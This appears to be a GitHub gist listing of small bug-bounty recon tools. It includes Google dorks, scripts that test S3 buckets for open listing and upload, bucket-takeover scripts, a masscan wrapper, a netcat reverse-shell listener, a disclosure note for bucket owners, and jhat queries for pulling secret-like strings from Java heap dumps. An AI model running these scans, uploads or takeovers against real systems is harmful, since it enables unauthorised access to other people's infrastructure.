💭
Hacking!

Robbie random-robbie
@random-robbie
random-robbie / alexa.txt
Created Dec 22, 2016
Alexa top 500 dorks
View alexa.txt
site:*.Google.com inurl:'&'
site:*.Youtube.com inurl:'&'
site:*.Facebook.com inurl:'&'
site:*.Baidu.com inurl:'&'
site:*.Wikipedia.org inurl:'&'
site:*.Yahoo.com inurl:'&'
site:*.Google.co.in inurl:'&'
site:*.Amazon.com inurl:'&'
site:*.Qq.com inurl:'&'
site:*.Google.co.jp inurl:'&'
View bucket_list.sh
#!/bin/bash
# Check whether the bucket named in $1 allows anonymous directory listing.
# Note: `aws s3 ls` has no --acl option; passing one makes the command fail
# before it ever talks to S3, so the original flag is dropped here.
echo "[*] Now Checking for Open S3 Buckets for listing dirs....[*]"
aws s3 ls "s3://$1" >/dev/null 2>/dev/null
RESULT=$?
if [ $RESULT -eq 0 ]; then
echo "[*] Bucket has Dirlistings Enabled [*]"
echo "[*] Bucket has Dirlistings Enabled https://$1.s3.amazonaws.com [*]" >> "/home/tools/mass-bounty/s3-results/$1-dirlistings.txt"
fi
View bucket_upload.sh
#!/bin/bash
# Check whether the bucket named in $1 accepts an unauthenticated upload.
echo "[*] Now Checking for Open S3 Buckets to upload POC to....[*]"
aws s3 cp poc.txt "s3://$1" --acl public-read >/dev/null 2>/dev/null
RESULT=$?
if [ $RESULT -eq 0 ]; then
echo "[*] POC Uploaded to https://$1.s3.amazonaws.com/poc.txt [*]"
echo "[*] POC Uploaded to https://$1.s3.amazonaws.com/poc.txt [*]" >> "/home/tools/mass-bounty/s3-results/$1-uploads.txt"
else
echo "[*] Bucket is not writable [*]"
fi
View bucket-takeover.sh
#!/bin/bash
aws s3api create-bucket --bucket $1 --acl public-read --region us-east-1
aws s3api put-bucket-website --bucket $1 --website-configuration file://redirect.json
View mass-scan.sh
#!/bin/bash
# Strip the scheme from the URL in $1, resolve the first A record, and
# full-port-scan it with masscan, teeing output to <host>_scan.
strip=$(echo "$1"|sed 's/https\?:\/\///')
echo ""
echo "######################################"
echo "$strip"
echo "######################################"
echo ""
masscan -p1-65535 $(dig +short "$strip"|grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"|head -1) --max-rate 1000 |& tee "${strip}_scan"
View reverseshell.md

How to get a reverse shell

Set up a listener on your VPS to connect back to

nc -lvp 4444
View s3-commands.md

Some S3 Commands

// Copy MyFile.txt in current directory to s3://my-bucket/path
$ aws s3 cp MyFile.txt s3://my-bucket/path/

// Move all .jpg files in s3://my-bucket/path to ./MyDirectory
$ aws s3 mv s3://my-bucket/path ./MyDirectory --exclude '*' --include '*.jpg' --recursive
View s3-pwn.md

If you are reading this, then there is a chance you have a poc.txt in your S3 bucket.

This is just a little heads-up to say that attackers can upload and overwrite files in your S3 bucket, and if you are serving files like JS from it they can add an XSS payload or a Coinhive miner to your JS.

If you log in to your AWS console and find the bucket, please remove the public-write permission from the bucket; this will fix the issue.

How to test an S3 bucket for bad permissions

View s3tko.sh
#!/bin/bash
touch index.html
touch error.html
aws s3api create-bucket --bucket $1 --region us-east-1
aws s3 website s3://$1/ --index-document index.html --error-document error.html
aws s3 cp index.html s3://$1 --acl public-read
aws s3 cp error.html s3://$1 --acl public-read
View jhat base searches
select {o: s,val:s.value.toString()} from java.lang.String s
where
/^[0-9A-Za-z!\\\/\"\?/+=;\&\(\)\[\]\.:-_@\'\#\*]{5,15}$/.test(s.value.toString())
select {o: s,val:s.value.toString()} from java.lang.String s
where
/^[0-9A-Za-z!\\\/\"\?/+=;\&\(\)\[\]\.:-_@\'\#\*]{19,31}$/.test(s.value.toString())
select {o: s,val:s.value.toString()} from java.lang.String s
where